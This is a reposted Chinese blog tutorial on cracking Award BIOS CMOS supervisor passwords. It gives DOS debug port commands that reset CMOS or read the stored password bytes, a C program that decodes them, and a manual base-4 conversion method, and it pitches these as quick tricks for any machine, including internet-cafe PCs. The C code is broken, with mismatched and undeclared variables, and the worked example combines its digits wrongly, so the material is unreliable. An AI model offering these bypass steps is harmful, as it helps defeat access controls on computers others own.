• 欢迎访问Ppabc博客网站,专注于Linux、CentOS、Apache、Nginx、MySQL、PHP等开源工具安装优化的技术博客,推荐使用最新版火狐浏览器和Chrome浏览器访问本网站,欢迎加入Ppabc博客
  • 如果您觉得本站非常有看点,那么赶紧使用Ctrl+D 收藏Ppabc博客吧

15秒内破解出cmos密码 [转载]

网络文摘 admin 16年前 (2003-06-14) 187次浏览

 

  *如果你觉得这个问题已经被大家灌烂了,请-返回-

*如果你只想”15 秒绿色环保型”请直接看方法 3:

*如果你想对 cmos 有个深入的了解或揪出本文理解的不足,请看方法 0,1,2,3-:)

—-CMOS (Award)密码简介与破解 0–3 法—-
计算机启动时,由存放在主板 ROM 中的 bios 将 cmos 数据调入内存中,以实现控制系统。
其中,Award 主板上的一小块 RAM 用于存放 CMOS 数据,地址为 00-7F 的共 128 个字节中。
当中的字节 1c 和 1d 存放的就是 cmos 的密码(即 Supervisor Password)。
而维持 cmos 数据存活的当然是那块锂电池了。
端口 70h,71h 用于对 cmos 数据的读写。

0–>>不是方法的方法 0–万能型也是最烂型:拔电池或跳线(放电)!!—阿鸟破系统密码呢?
1–>>破解方法 1–挺烂:
进入 dos,用 debug
-o 70 10
-o 71 01
-q
重启后,可以直接进入 cmos,而没有密码询问了。
这种方法是通过向 cmos 芯片写入数字,导致开机检测时无法通过其奇偶校验,从而使 cmos 芯片数据重新恢复到默认的出厂值!!!

唉。。。。!!!好不容易,设置的 cmos 参数,就这样毁于 debug 了,55555555555~~~~~别哭别哭,看看下面的 2 种方法就一切 ok 了
–>>方法 2:当然是编程实现喽,
首先声明:此程序”算法”并不是我编写的,原作者 unkown
具体操作简介如下:
outportb(0x70,i); 将 i 字节的数据写到端口 70
cmospass=_inp(0x71); 将 71 端口的数据读出到终端并存入变量 cmospass
程序实现将这两个字节 0x1c,0x1d 的数据读出来,并转化成四进制,合并成 8 位即可
—-(award 主板脆弱的加密方法,难怪只听到 award 密码的破解。。。)

程序测试系统:win98se
编译工具:turboc2

以下为 cmospass 的源代码:cmospass.c
代码:
——————————————————————————–
void main()
{
int n;
char comspass;
char temp=0;
printf(“\nThis program only is tested at win98 and award bios!!\n”);
printf(“The password of the cmos is:”);

outportb(0x70,0x1d);
comspass=inportb(0x71);
for(n=6;n>=0;n-=2)
{ temp=cmospass;
temp>>=n;
temp=temp&0x03;
printf(“%d”,temp);
}
outportb(0x70,0x1c);
result=inportb(0x71);
for(n=6;n>=0;n-=2)
{ temp=cmospass;
temp>>=n;
temp=temp&0x03;
printf(“%d”,temp);
}

printf(“\n–By skyjacker”);
printf(“\n–http://lastknife.yeah.net—Welcome to here!!”);
printf(“\n—-2002.01.04—- \n”);
}



3–>>方法 3–绿色环保型:
我觉得这也是现在最快,最好,最实用的方法了!!!!!
无论你到哪里,包括网吧好像也是一大堆 award 吧
如果你暂时无 c 语言编译器或相关破解程序,用这种的方法也可以快速破解出 cmos 密码(15 秒完全可以了,你用了多少呢?)
主要是看你键盘输入以及实现 16 进制和 4 进制的转化的速度(考试啊?-:)
过程有三步:(很简单的,不过说明有点麻烦罢了:)

1。进入 ms-dos,键入 debug(这不是清除 cmos 密码吗?—放心,这次不会了:),
出现字符“-”,键入如下指令
c:\debug
-o 70 1d
-i 71
xx
-o 70 1c
-i 71
yy
-q

注:xx,yy 是显示结果,1d,1c 这两个单元存放的是 cmos 密码加密后的结果,
计下这两个 16 进制数

2.将他们转化为 4 进制
比如:
xx 是 8E,转化后为 2032,
yy 为 3B,转化后就是 0323,

两个合并 xxyy 为 22201001 ,这就是 cmos 的密码了.
(我的原先密码为 87654321 同样还有效!!)
如果 xx 或 yy 转化后,不足四位则在最前面加”0″凑足四位(比如 0323).
如果你的运气不坏的话,成功率为 98%以上.(毕竟 award 主板也有许多别的型号).
3.如果懒的计算的话,用 win2000 的科学型计算器转化即可(15 秒之内如何?).
(win98 中无 16 进制和 4 进制的转化,非运算不可了:)

==文献整理:【中国绿鹰网络安全联盟】(http://www.cnlvker.com)==


Selinux 中国 , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明原文链接:15 秒内破解出 cmos 密码 [转载]
喜欢 (0)